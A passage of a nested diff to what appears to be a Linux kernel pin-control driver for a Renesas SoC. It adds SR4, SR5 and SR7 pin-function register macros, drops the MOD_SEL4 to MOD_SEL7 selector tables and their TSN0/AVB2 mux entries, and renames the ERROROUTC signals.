++#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR8 */
+-/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ #define PINMUX_GPSR	\
+ 						GPSR3_29											\
+@@ -542,6 +604,24 @@ FM(IP0SR3_23_20)	IP0SR3_23_20	FM(IP1SR3_23_20)	IP1SR3_23_20	FM(IP2SR3_23_20)	IP2
+ FM(IP0SR3_27_24)	IP0SR3_27_24	FM(IP1SR3_27_24)	IP1SR3_27_24	FM(IP2SR3_27_24)	IP2SR3_27_24						\
+ FM(IP0SR3_31_28)	IP0SR3_31_28	FM(IP1SR3_31_28)	IP1SR3_31_28	FM(IP2SR3_31_28)	IP2SR3_31_28						\
+ \
++FM(IP0SR4_3_0)		IP0SR4_3_0	FM(IP1SR4_3_0)		IP1SR4_3_0	FM(IP2SR4_3_0)		IP2SR4_3_0	FM(IP3SR4_3_0)		IP3SR4_3_0	\
++FM(IP0SR4_7_4)		IP0SR4_7_4	FM(IP1SR4_7_4)		IP1SR4_7_4	FM(IP2SR4_7_4)		IP2SR4_7_4	\
++FM(IP0SR4_11_8)		IP0SR4_11_8	FM(IP1SR4_11_8)		IP1SR4_11_8	FM(IP2SR4_11_8)		IP2SR4_11_8	\
++FM(IP0SR4_15_12)	IP0SR4_15_12	FM(IP1SR4_15_12)	IP1SR4_15_12	FM(IP2SR4_15_12)	IP2SR4_15_12	\
++FM(IP0SR4_19_16)	IP0SR4_19_16	FM(IP1SR4_19_16)	IP1SR4_19_16	FM(IP2SR4_19_16)	IP2SR4_19_16	\
++FM(IP0SR4_23_20)	IP0SR4_23_20	FM(IP1SR4_23_20)	IP1SR4_23_20	FM(IP2SR4_23_20)	IP2SR4_23_20	\
++FM(IP0SR4_27_24)	IP0SR4_27_24	FM(IP1SR4_27_24)	IP1SR4_27_24	FM(IP2SR4_27_24)	IP2SR4_27_24	\
++FM(IP0SR4_31_28)	IP0SR4_31_28	FM(IP1SR4_31_28)	IP1SR4_31_28	FM(IP2SR4_31_28)	IP2SR4_31_28	\
++\
++FM(IP0SR5_3_0)		IP0SR5_3_0	FM(IP1SR5_3_0)		IP1SR5_3_0	FM(IP2SR5_3_0)		IP2SR5_3_0	\
++FM(IP0SR5_7_4)		IP0SR5_7_4	FM(IP1SR5_7_4)		IP1SR5_7_4	FM(IP2SR5_7_4)		IP2SR5_7_4	\
++FM(IP0SR5_11_8)		IP0SR5_11_8	FM(IP1SR5_11_8)		IP1SR5_11_8	FM(IP2SR5_11_8)		IP2SR5_11_8	\
++FM(IP0SR5_15_12)	IP0SR5_15_12	FM(IP1SR5_15_12)	IP1SR5_15_12	FM(IP2SR5_15_12)	IP2SR5_15_12	\
++FM(IP0SR5_19_16)	IP0SR5_19_16	FM(IP1SR5_19_16)	IP1SR5_19_16	FM(IP2SR5_19_16)	IP2SR5_19_16	\
++FM(IP0SR5_23_20)	IP0SR5_23_20	FM(IP1SR5_23_20)	IP1SR5_23_20	\
++FM(IP0SR5_27_24)	IP0SR5_27_24	FM(IP1SR5_27_24)	IP1SR5_27_24	\
++FM(IP0SR5_31_28)	IP0SR5_31_28	FM(IP1SR5_31_28)	IP1SR5_31_28	\
++\
+ FM(IP0SR6_3_0)		IP0SR6_3_0	FM(IP1SR6_3_0)		IP1SR6_3_0	FM(IP2SR6_3_0)		IP2SR6_3_0	\
+ FM(IP0SR6_7_4)		IP0SR6_7_4	FM(IP1SR6_7_4)		IP1SR6_7_4	FM(IP2SR6_7_4)		IP2SR6_7_4	\
+ FM(IP0SR6_11_8)		IP0SR6_11_8	FM(IP1SR6_11_8)		IP1SR6_11_8	FM(IP2SR6_11_8)		IP2SR6_11_8	\
+@@ -569,54 +649,6 @@ FM(IP0SR8_23_20)	IP0SR8_23_20	FM(IP1SR8_23_20)	IP1SR8_23_20	\
+ FM(IP0SR8_27_24)	IP0SR8_27_24	\
+ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+-/* MOD_SEL4 */			/* 0 */				/* 1 */
+-#define MOD_SEL4_19		FM(SEL_TSN0_TD2_0)		FM(SEL_TSN0_TD2_1)
+-#define MOD_SEL4_18		FM(SEL_TSN0_TD3_0)		FM(SEL_TSN0_TD3_1)
+-#define MOD_SEL4_15		FM(SEL_TSN0_TD0_0)		FM(SEL_TSN0_TD0_1)
+-#define MOD_SEL4_14		FM(SEL_TSN0_TD1_0)		FM(SEL_TSN0_TD1_1)
+-#define MOD_SEL4_12		FM(SEL_TSN0_TXC_0)		FM(SEL_TSN0_TXC_1)
+-#define MOD_SEL4_9		FM(SEL_TSN0_TX_CTL_0)		FM(SEL_TSN0_TX_CTL_1)
+-#define MOD_SEL4_8		FM(SEL_TSN0_AVTP_PPS0_0)	FM(SEL_TSN0_AVTP_PPS0_1)
+-#define MOD_SEL4_5		FM(SEL_TSN0_AVTP_MATCH_0)	FM(SEL_TSN0_AVTP_MATCH_1)
+-#define MOD_SEL4_2		FM(SEL_TSN0_AVTP_PPS1_0)	FM(SEL_TSN0_AVTP_PPS1_1)
+-#define MOD_SEL4_1		FM(SEL_TSN0_MDC_0)		FM(SEL_TSN0_MDC_1)
+-
+-/* MOD_SEL5 */			/* 0 */				/* 1 */
+-#define MOD_SEL5_19		FM(SEL_AVB2_TX_CTL_0)		FM(SEL_AVB2_TX_CTL_1)
+-#define MOD_SEL5_16		FM(SEL_AVB2_TXC_0)		FM(SEL_AVB2_TXC_1)
+-#define MOD_SEL5_15		FM(SEL_AVB2_TD0_0)		FM(SEL_AVB2_TD0_1)
+-#define MOD_SEL5_12		FM(SEL_AVB2_TD1_0)		FM(SEL_AVB2_TD1_1)
+-#define MOD_SEL5_11		FM(SEL_AVB2_TD2_0)		FM(SEL_AVB2_TD2_1)
+-#define MOD_SEL5_8		FM(SEL_AVB2_TD3_0)		FM(SEL_AVB2_TD3_1)
+-#define MOD_SEL5_6		FM(SEL_AVB2_MDC_0)		FM(SEL_AVB2_MDC_1)
+-#define MOD_SEL5_5		FM(SEL_AVB2_MAGIC_0)		FM(SEL_AVB2_MAGIC_1)
+-#define MOD_SEL5_2		FM(SEL_AVB2_AVTP_MATCH_0)	FM(SEL_AVB2_AVTP_MATCH_1)
+-#define MOD_SEL5_0		FM(SEL_AVB2_AVTP_PPS_0)		FM(SEL_AVB2_AVTP_PPS_1)
+-
+-/* MOD_SEL6 */			/* 0 */				/* 1 */
+-#define MOD_SEL6_18		FM(SEL_AVB1_TD3_0)		FM(SEL_AVB1_TD3_1)
+-#define MOD_SEL6_16		FM(SEL_AVB1_TD2_0)		FM(SEL_AVB1_TD2_1)
+-#define MOD_SEL6_13		FM(SEL_AVB1_TD0_0)		FM(SEL_AVB1_TD0_1)
+-#define MOD_SEL6_12		FM(SEL_AVB1_TD1_0)		FM(SEL_AVB1_TD1_1)
+-#define MOD_SEL6_10		FM(SEL_AVB1_AVTP_PPS_0)		FM(SEL_AVB1_AVTP_PPS_1)
+-#define MOD_SEL6_7		FM(SEL_AVB1_TX_CTL_0)		FM(SEL_AVB1_TX_CTL_1)
+-#define MOD_SEL6_6		FM(SEL_AVB1_TXC_0)		FM(SEL_AVB1_TXC_1)
+-#define MOD_SEL6_5		FM(SEL_AVB1_AVTP_MATCH_0)	FM(SEL_AVB1_AVTP_MATCH_1)
+-#define MOD_SEL6_2		FM(SEL_AVB1_MDC_0)		FM(SEL_AVB1_MDC_1)
+-#define MOD_SEL6_1		FM(SEL_AVB1_MAGIC_0)		FM(SEL_AVB1_MAGIC_1)
+-
+-/* MOD_SEL7 */			/* 0 */				/* 1 */
+-#define MOD_SEL7_16		FM(SEL_AVB0_TX_CTL_0)		FM(SEL_AVB0_TX_CTL_1)
+-#define MOD_SEL7_15		FM(SEL_AVB0_TXC_0)		FM(SEL_AVB0_TXC_1)
+-#define MOD_SEL7_13		FM(SEL_AVB0_MDC_0)		FM(SEL_AVB0_MDC_1)
+-#define MOD_SEL7_11		FM(SEL_AVB0_TD0_0)		FM(SEL_AVB0_TD0_1)
+-#define MOD_SEL7_10		FM(SEL_AVB0_MAGIC_0)		FM(SEL_AVB0_MAGIC_1)
+-#define MOD_SEL7_7		FM(SEL_AVB0_TD1_0)		FM(SEL_AVB0_TD1_1)
+-#define MOD_SEL7_6		FM(SEL_AVB0_TD2_0)		FM(SEL_AVB0_TD2_1)
+-#define MOD_SEL7_3		FM(SEL_AVB0_TD3_0)		FM(SEL_AVB0_TD3_1)
+-#define MOD_SEL7_2		FM(SEL_AVB0_AVTP_MATCH_0)	FM(SEL_AVB0_AVTP_MATCH_1)
+-#define MOD_SEL7_0		FM(SEL_AVB0_AVTP_PPS_0)		FM(SEL_AVB0_AVTP_PPS_1)
+-
+ /* MOD_SEL8 */			/* 0 */				/* 1 */
+ #define MOD_SEL8_11		FM(SEL_SDA5_0)			FM(SEL_SDA5_1)
+ #define MOD_SEL8_10		FM(SEL_SCL5_0)			FM(SEL_SCL5_1)
+@@ -633,26 +665,18 @@ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+ #define PINMUX_MOD_SELS \
+ \
+-MOD_SEL4_19		MOD_SEL5_19										\
+-MOD_SEL4_18					MOD_SEL6_18							\
+-														\
+-			MOD_SEL5_16		MOD_SEL6_16		MOD_SEL7_16				\
+-MOD_SEL4_15		MOD_SEL5_15					MOD_SEL7_15				\
+-MOD_SEL4_14													\
+-						MOD_SEL6_13		MOD_SEL7_13				\
+-MOD_SEL4_12		MOD_SEL5_12		MOD_SEL6_12							\
+-			MOD_SEL5_11					MOD_SEL7_11		MOD_SEL8_11	\
+-						MOD_SEL6_10		MOD_SEL7_10		MOD_SEL8_10	\
+-MOD_SEL4_9											MOD_SEL8_9	\
+-MOD_SEL4_8		MOD_SEL5_8								MOD_SEL8_8	\
+-						MOD_SEL6_7		MOD_SEL7_7		MOD_SEL8_7	\
+-			MOD_SEL5_6		MOD_SEL6_6		MOD_SEL7_6		MOD_SEL8_6	\
+-MOD_SEL4_5		MOD_SEL5_5		MOD_SEL6_5					MOD_SEL8_5	\
+-												MOD_SEL8_4	\
+-									MOD_SEL7_3		MOD_SEL8_3	\
+-MOD_SEL4_2		MOD_SEL5_2		MOD_SEL6_2		MOD_SEL7_2		MOD_SEL8_2	\
+-MOD_SEL4_1					MOD_SEL6_1					MOD_SEL8_1	\
+-			MOD_SEL5_0					MOD_SEL7_0		MOD_SEL8_0
++MOD_SEL8_11	\
++MOD_SEL8_10	\
++MOD_SEL8_9	\
++MOD_SEL8_8	\
++MOD_SEL8_7	\
++MOD_SEL8_6	\
++MOD_SEL8_5	\
++MOD_SEL8_4	\
++MOD_SEL8_3	\
++MOD_SEL8_2	\
++MOD_SEL8_1	\
++MOD_SEL8_0
+ 
+ enum {
+ 	PINMUX_RESERVED = 0,
+@@ -686,61 +710,8 @@ enum {
+ static const u16 pinmux_data[] = {
+ 	PINMUX_DATA_GP_ALL(),
+ 
+-	PINMUX_SINGLE(AVS1),
+-	PINMUX_SINGLE(AVS0),
+-	PINMUX_SINGLE(PCIE1_CLKREQ_N),
+-	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+-
+-	/* TSN0 without MODSEL4 */
+-	PINMUX_SINGLE(TSN0_TXCREFCLK),
+-	PINMUX_SINGLE(TSN0_RD2),
+-	PINMUX_SINGLE(TSN0_RD3),
+-	PINMUX_SINGLE(TSN0_RD1),
+-	PINMUX_SINGLE(TSN0_RXC),
+-	PINMUX_SINGLE(TSN0_RD0),
+-	PINMUX_SINGLE(TSN0_RX_CTL),
+-	PINMUX_SINGLE(TSN0_AVTP_CAPTURE),
+-	PINMUX_SINGLE(TSN0_LINK),
+-	PINMUX_SINGLE(TSN0_PHY_INT),
+-	PINMUX_SINGLE(TSN0_MDIO),
+-	/* TSN0 with MODSEL4 */
+-	PINMUX_IPSR_NOGM(0, TSN0_TD2,		SEL_TSN0_TD2_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD3,		SEL_TSN0_TD3_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD0,		SEL_TSN0_TD0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD1,		SEL_TSN0_TD1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TXC,		SEL_TSN0_TXC_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TX_CTL,	SEL_TSN0_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS0,	SEL_TSN0_AVTP_PPS0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_MATCH,	SEL_TSN0_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS1,	SEL_TSN0_AVTP_PPS1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_MDC,		SEL_TSN0_MDC_1),
+-
+-	/* TSN0 without MODSEL5 */
+-	PINMUX_SINGLE(AVB2_RX_CTL),
+-	PINMUX_SINGLE(AVB2_RXC),
+-	PINMUX_SINGLE(AVB2_RD0),
+-	PINMUX_SINGLE(AVB2_RD1),
+-	PINMUX_SINGLE(AVB2_RD2),
+-	PINMUX_SINGLE(AVB2_MDIO),
+-	PINMUX_SINGLE(AVB2_RD3),
+-	PINMUX_SINGLE(AVB2_TXCREFCLK),
+-	PINMUX_SINGLE(AVB2_PHY_INT),
+-	PINMUX_SINGLE(AVB2_LINK),
+-	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+-	/* TSN0 with MODSEL5 */
+-	PINMUX_IPSR_NOGM(0, AVB2_TX_CTL,	SEL_AVB2_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TXC,		SEL_AVB2_TXC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD0,		SEL_AVB2_TD0_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD1,		SEL_AVB2_TD1_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD2,		SEL_AVB2_TD2_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD3,		SEL_AVB2_TD3_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MDC,		SEL_AVB2_MDC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MAGIC,		SEL_AVB2_MAGIC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_MATCH,	SEL_AVB2_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_PPS,	SEL_AVB2_AVTP_PPS_1),
+-
+ 	/* IP0SR0 */
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_B),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+@@ -1006,7 +977,7 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_A),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+@@ -1029,26 +1000,86 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP3SR3_19_16,	RPC_WP_N),
+ 	PINMUX_IPSR_GPSR(IP3SR3_23_20,	RPC_INT_N),
+ 
++	/* IP0SR4 */
++	PINMUX_IPSR_GPSR(IP0SR4_3_0,	TSN0_MDIO),
++	PINMUX_IPSR_GPSR(IP0SR4_7_4,	TSN0_MDC),
++	PINMUX_IPSR_GPSR(IP0SR4_11_8,	TSN0_AVTP_PPS1),
++	PINMUX_IPSR_GPSR(IP0SR4_15_12,	TSN0_PHY_INT),
